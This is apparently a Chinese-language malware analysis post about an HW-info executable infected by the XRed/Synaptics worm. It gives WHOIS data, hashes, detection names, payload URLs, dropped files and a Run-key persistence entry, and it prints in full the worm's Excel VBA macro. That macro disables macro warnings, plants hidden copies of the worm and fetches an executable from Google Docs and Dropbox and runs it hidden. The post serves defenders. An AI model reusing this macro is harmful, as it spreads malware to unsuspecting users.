已下载,下方同步样本的进度,建议对U盘等资产进行全盘扫描
目前快速/初步结果为软件被蠕虫感染,而非病毒由此软件产生
目前火绒能对该蠕虫病毒,进行
清除恶意代码,将文件还原正常
病毒通讯
域 名 mooo[.]com
注册商 Porkbun LLC
注册人 Socketfire, Inc
邮 箱
省/州 加利福尼亚州(California)
地 区 美国(US)
注册日 2000-03-24 14:27:37 UTC+8
过期日 2028-03-24 13:27:37 UTC+8
更新日 2025-01-15 03:25:14 UTC+8
IANA_ID 1861
状 态 客户端禁止删除
客户端禁止转移
禁止删除
禁止转移
DNS ns1[.]afraid[.]org
ns2[.]afraid[.]org
ns3[.]afraid[.]org
ns4[.]afraid[.]org
DNSSEC 未配置
域 名 site50[.]net
注册商 GoDaddy.com, LLC
注册日 2008-08-08 10:41:16 UTC+8
过期日 2028-08-08 10:41:16 UTC+8
更新日 2026-08-08 19:57:58 UTC+8
IANA_ID 146
状 态 客户端禁止删除
客户端禁止续费
客户端禁止转移
客户端禁止更新
DNS dns1[.]000webhost[.]com
dns2[.]000webhost[.]com
DNSSEC 未配置
文件指纹(被感染)
HW-info-svr.exe
大小: 859136 字节 : 839 KiB
CRC32: BDB94301
CRC64: 99E6E213C8000942
XXH64: B01BA4FD85C25F5E
SHA256: 89416d130c4cac636a651145a4907779be005648134c7eb3795f6d889ab6c245
SHA3-256: 1815f1ddf78479b5f124f00fb6cb23efc1894e3f3a4b330077f762c747ca82a0
HW-info-167775531-app.exe
大小: 859136 字节 : 839 KiB
CRC32: BDB94301
XXH64: B01BA4FD85C25F5E
SHA256: 89416d130c4cac636a651145a4907779be005648134c7eb3795f6d889ab6c245
SHA3-256: 1815f1ddf78479b5f124f00fb6cb23efc1894e3f3a4b330077f762c747ca82a0
文件指纹(清除后)
HW-info-svr.exe
大小: 87568 字节 : 85 KiB
CRC32: B370766E
CRC64: D34F773A7B5B8E3B
XXH64: BEB22B7FA610E892
SHA256: 93c817b142164632e97c5f13893cf298ae28a3da49fcbc4285776be2b13d7284
SHA3-256: 9b4e4baf774328e401729b893e27da25b18dd7141f4c392702935b2569a32621
HW-info-167775531-app.exe
大小: 87568 字节 : 85 KiB
CRC32: B370766E
CRC64: D34F773A7B5B8E3B
XXH64: BEB22B7FA610E892
SHA256: 93c817b142164632e97c5f13893cf298ae28a3da49fcbc4285776be2b13d7284
SHA3-256: 9b4e4baf774328e401729b893e27da25b18dd7141f4c392702935b2569a32621
火绒扫描(我自己的本地扫描结果)
6.0.11.3 版本
09-13 18:49 病毒库
2026/09/14 12:10:18
病毒防护
病毒查杀
自定义扫描(手动执行),发现2个风险项目
病毒库时间:2026-09-13 18:49
开始时间:2026-09-14 12:10
执行类型:手动执行
扫描类型:自定义扫描
总计用时:00:00:01
扫描对象:2
扫描文件:2
发现风险:2
已处理风险:2
病毒详情:
风险路径:HW-info-svr.exe
风险路径:HW-info-167775531-app.exe
病毒名:Virus/Synares.a$SA
病毒ID:D2FA1336675E0954
处理结果:已处理,清除恶意代码
卡巴病历
Trojan.XRed.UDP.C&C
Trojan.Win32.XRed.*t
Trojan.Win32.XRed.*b
Trojan.Win32.XRed.ox
Trojan.Win32.XRed.op
Trojan.Win32.XRed.nd
Trojan.Win32.XRed.mq
Trojan.Win32.XRed.mg
Trojan.Win32.Agent.*b
Backdoor.Agent.HTTP.C&C
Trojan.Win32.Agentb.jrhy
BSS:Exploit.Win32.Generic
Trojan.MSOffice.SAgent.*b
HEUR:Trojan.Script.Generic
Backdoor.Win32.DarkKomet.hqxy
VHO:Trojan.MSOffice.SAgent.gen
Trojan-Dropper.Win32.Dorifel.sbd
HEUR:Trojan-Ransom.Win32.Gen.gen
HEUR:Trojan-Downloader.Script.Generic
HEUR:Trojan-Downloader.MSOffice.Agent.gen
恶意载荷
http://xred[.]site50[.]net/syn/SUpdate.ini
http://xred[.]site50[.]net/syn/Synaptics.rar
http://xred[.]site50[.]net/syn/SSLLibrary.dll
https://www[.]dropbox[.]com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1
https://www[.]dropbox[.]com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1
https://www[.]dropbox[.]com/s/zhp1b06imehwylq/Synaptics.rar?dl=1
https://docs[.]google[.]com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
https://docs[.]google[.]com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download
https://docs[.]google[.]com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download
https://freedns[.]afraid[.]org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
释放文件
%LocalAppData%\Temp\86210000
%USERPROFILE%\Desktop\~$cache1
%USERPROFILE%\AppData\Roaming\WinSl
%LocalAppData%\Temp\~$2tjYID4v.xlsm
C:\ProgramData\Synaptics\RCXDD6F.tmp
C:\ProgramData\Synaptics\Synaptics.exe
%USERPROFILE%\Desktop\~$My Document.xlsx
%LocalAppData%\Temp\~DFFDCC06994B44E096.TMP
%LocalAppData%\Temp\rRkw\._cache_8frufytb_7b4fa047e.exe <<<B370766E,蠕虫释放未感染的正常文件
%LocalAppData%\Temp\{1EEB5481-619C-4EF1-9918-C71451630E63} - OProcSessId.dat
感染文件
%USERPROFILE%\Desktop\My Document.xlsm
%USERPROFILE%\Desktop\~$My Document.xlsx
修改覆盖
%LocalAppData%\Microsoft\Office\OTele\excel.exe.db-wal
%LocalAppData%\Microsoft\Office\OTele\excel.exe.db-shm
%LocalAppData%\Microsoft\Office\16.0\excel.exe_Rules.xml
%LocalAppData%\Microsoft\Office\OTele\excel.exe.db.session-journal
%LocalAppData%\Microsoft\TokenBroker\Cache\089d66ba04a8cec4bdc5267f42f39cf84278bb67.tbres
%LocalAppData%\Microsoft\TokenBroker\Cache\5475cb191e478c39370a215b2da98a37e9dc813d.tbres
%LocalAppData%\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\8C98ABC0-1C19-4D21-BEC8-EB990BDFB937
执行命令
C:\ProgramData\Synaptics\Synaptics.exe InjUpdate
"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
设置键值
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver
Synaptics Pointing Device Driver
REG_SZ
C:\ProgramData\Synaptics\Synaptics.exe
恶意宏码
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Dim SheetsChanged As Boolean
Dim SheetCount As Integer
Private Sub Workbook_Open()
Dim i As Integer
For i = 1 To ActiveWorkbook.Sheets.Count
ActiveWorkbook.Sheets(i).Visible = xlSheetVisible
Next i
RegKeySave "HKCU\Software\Microsoft\Office\" & Application.Version & "\Excel\Security\VBAWarnings", 1, "REG_DWORD"
RegKeySave "HKCU\Software\Microsoft\Office\" & Application.Version & "\Word\Security\VBAWarnings", 1, "REG_DWORD"
Application.DisplayAlerts = False
SheetCount = Worksheets.Count
Call MPS
ActiveWorkbook.Sheets(1).Select
SheetsChanged = False
End Sub
Private Sub Workbook_BeforeClose(Cancel As Boolean)
If Not SheetsChanged Then
ActiveWorkbook.Saved = True
End If
End Sub
Private Sub Workbook_SheetChange(ByVal Sh As Object, ByVal Target As Range)
SheetsChanged = True
End Sub
Private Sub Workbook_NewSheet(ByVal Sh As Object)
SheetsChanged = True
End Sub
Private Sub Workbook_SheetActivate(ByVal Sh As Object)
If ActiveWorkbook.Sheets.Count <> SheetCount Then
SheetsChanged = True
SheetCount = ActiveWorkbook.Sheets.Count
End If
End Sub
Private Sub Workbook_BeforeSave(ByVal SaveAsUI As Boolean, Cancel As Boolean)
Dim i As Integer
Dim AIndex As Integer
Dim FName
AIndex = ActiveWorkbook.ActiveSheet.Index
If SaveAsUI = False Then
Cancel = True
Application.EnableEvents = False
Application.ScreenUpdating = False
For i = 1 To ActiveWorkbook.Sheets.Count - 1
ActiveWorkbook.Sheets(i).Visible = xlSheetHidden
Next i
ActiveWorkbook.Save
For i = 1 To ActiveWorkbook.Sheets.Count
ActiveWorkbook.Sheets(i).Visible = xlSheetVisible
Next i
ActiveWorkbook.Sheets(AIndex).Select
SheetsChanged = False
Application.ScreenUpdating = True
Application.EnableEvents = True
Else
Cancel = True
Application.EnableEvents = False
Application.ScreenUpdating = False
For i = 1 To ActiveWorkbook.Sheets.Count - 1
ActiveWorkbook.Sheets(i).Visible = xlSheetHidden
Next i
FName = Application.GetSaveAsFilename(fileFilter:="Excel Çalışma Kitabı (*.xlsm), *.xlsm")
If FName <> False Then
ActiveWorkbook.SaveAs Filename:=FName, FileFormat:=xlOpenXMLWorkbookMacroEnabled
SaveAsInj ActiveWorkbook.Path
End If
For i = 1 To ActiveWorkbook.Sheets.Count
ActiveWorkbook.Sheets(i).Visible = xlSheetVisible
Next i
ActiveWorkbook.Sheets(AIndex).Select
SheetsChanged = False
Application.ScreenUpdating = True
Application.EnableEvents = True
End If
End Sub
Sub SaveAsInj(DIR As String)
Dim FSO As Object
Dim FN As String
Set FSO = CreateObject("scripting.filesystemobject")
FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
If FSO.FileExists(FN) Then
If Not FSO.FileExists(DIR & "\~$cache1") Then
FileCopy FN, DIR & "\~$cache1"
End If
SetAttr (DIR & "\~$cache1"), vbHidden + vbSystem
End If
End Sub
Function RegKeyRead(i_RegKey As String) As String
Dim myWS As Object
On Error Resume Next
Set myWS = CreateObject("WScript.Shell")
RegKeyRead = myWS.RegRead(i_RegKey)
End Function
Function RegKeyExists(i_RegKey As String) As Boolean
Dim myWS As Object
On Error GoTo ErrorHandler
Set myWS = CreateObject("WScript.Shell")
myWS.RegRead i_RegKey
RegKeyExists = True
Exit Function
ErrorHandler:
RegKeyExists = False
End Function
Sub RegKeySave(i_RegKey As String, _
i_Value As String, _
Optional i_Type As String = "REG_SZ")
Dim myWS As Object
Set myWS = CreateObject("WScript.Shell")
myWS.RegWrite i_RegKey, i_Value, i_Type
End Sub
Sub MPS()
Dim FSO As Object
Dim FP(1 To 3), TMP, URL(1 To 3) As String
Set FSO = CreateObject("scripting.filesystemobject")
FP(1) = ActiveWorkbook.Path & "\~$cache1"
FP(2) = ActiveWorkbook.Path & "\Synaptics.exe"
URL(1) = "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download"
URL(2) = "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1"
URL(3) = "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1"
TMP = Environ("Temp") & "\~$cache1.exe"
If FSO.FileExists(FP(1)) Then
If Not FSO.FileExists(TMP) Then
FileCopy FP(1), TMP
End If
Shell TMP, vbHide
ElseIf FSO.FileExists(FP(2)) Then
If Not FSO.FileExists(TMP) Then
FileCopy FP(2), TMP
End If
Shell TMP, vbHide
Else
If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
ElseIf Not FSO.FileExists(TMP) Then
If FDW((URL(1)), (TMP)) Then
ElseIf FDW((URL(2)), (TMP)) Then
ElseIf FDW((URL(3)), (TMP)) Then
End If
If FSO.FileExists(TMP) Then
Shell TMP, vbHide
End If
Else
Shell TMP, vbHide
End If
End If
End Sub
Function FDW(MYU, NMA As String) As Boolean
Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
If WinHttpReq Is Nothing Then
Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
End If
WinHttpReq.Option(0) = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"
WinHttpReq.Option(6) = AllowRedirects
WinHttpReq.Open "GET", MYU, False
WinHttpReq.Send
If (WinHttpReq.Status = 200) Then
If (InStr(WinHttpReq.ResponseText, "404 Not Found") = 0) And (InStr(WinHttpReq.ResponseText, ">Not Found<") = 0) And (InStr(WinHttpReq.ResponseText, "Dropbox - Error") = 0) Then
FDW = True
Set oStream = CreateObject("ADODB.Stream")
oStream.Open
oStream.Type = 1
oStream.Write WinHttpReq.ResponseBody
oStream.SaveToFile (NMA)
oStream.Close
Else
FDW = False
End If
Else
FDW = False
End If
End Function
文件属性(被感染)
[ Malware installer - set Autorun->SynaptiCS.exe ] - not a real Synaptics installer - stub : Borland Delphi ( 2.0 - 7.0 ) 1992 - borland.com
Ripp for orginal exe file , infect all exe files ! , exe or archives inside RES
调试符号
无
编译时间
1992-06-20 06:22:17
类型
应用程序
文件版本
1.0.0.4
产品版本
1.0.0.0
公司名称
Synaptics
产品名称
Synaptics Pointing Device Driver
语言
土耳其语(土耳其)
原始文件名
空
文件属性(清除后)
MS Visual C# / Basic.NET [ Link 48 ] [Deb. 02] - EP Token : 060000C5 - [ WARNING : Debug x 7 ] ,
Overlay : Signed
调试符号
C:\1、软件工具\电脑信息收集软件HW-info_v2.0\hw-info-master\HW_info\obj\Debug\HW-info-svr.pdb
编译时间
2026-02-02 09:11:35
类型
应用程序
文件说明
产品名称
HW_info
文件版本
产品版本
2.0.9529.16547
版权
Copyright © 2024
语言
语言中性
原始文件名
HW-info-svr.exe
异常数签(清除后)
已处理证书链,但是在不受信任提供程序信任的根证书中终止。
由于 CA 根证书不在 “ 受信任的根证书颁发机构 ” 存储区中,所以它不受信任。
此 CA 根目录证书不受信任。要启用信任,请将该证书安装到 “ 受信任的根证书颁发机构 ” 存储区。
DESKTOP-PK8BO1P\Administrator
签名时间不可用
SHA256 摘要算法,RSA 摘要加密算法
DESKTOP-PK8BO1P\Administrator 签发
证书序列号:27 23 68 41 9d 25 d6 ba 4e 46 0b c4 72 2e 1c e9
样本情况(被感染)
https://ata.360.net/report/866515348895744
https://virusscan.jotti.org/zh-CN/filescanjob/midv6gve9b
https://tix.qq.com/search/single?keyword=57b4fa047e15b9635e58935eec1bfae2
https://sandbox.ti.qianxin.com/sandbox/page/detail?type=file&id=AaCeJztymTITNisARHhG
https://www.maldun.com/analysis/YXNkZmRzZmFkc2YxMzUzMzc2ZHNmYXNkZmFzZGY=/
https://sandbox.dbappsecurity.com.cn/analysis/cb11c361-b4d7-4778-b331-89e47b5552ec/flat
https://fenxi.antiy.cn/#/entirety/file/searchResult?hash=57b4fa047e15b9635e58935eec1bfae2
https://virus.cverc.org.cn/#/entirety/file/searchResult?hash=57b4fa047e15b9635e58935eec1bfae2
https://metadefender.com/results/file/bzI2MDkxNFFkU3ZSOTY1N0drMjFxNXdCU2Mz_mdaas/overview
https://www.virscan.org/report/89416d130c4cac636a651145a4907779be005648134c7eb3795f6d889ab6c245
https://www.virustotal.com/gui/file/89416d130c4cac636a651145a4907779be005648134c7eb3795f6d889ab6c245
https://s.threatbook.com/report/file/89416d130c4cac636a651145a4907779be005648134c7eb3795f6d889ab6c245
https://sandbox.qianxin.com/tq/report/toNewReport.do?rid=fa1cbedcc94b47d9507e8c33591dd077&sk=43004838
https://opentip.kaspersky.com/89416D130C4CAC636A651145A4907779BE005648134C7EB3795F6D889AB6C245/results?tab=upload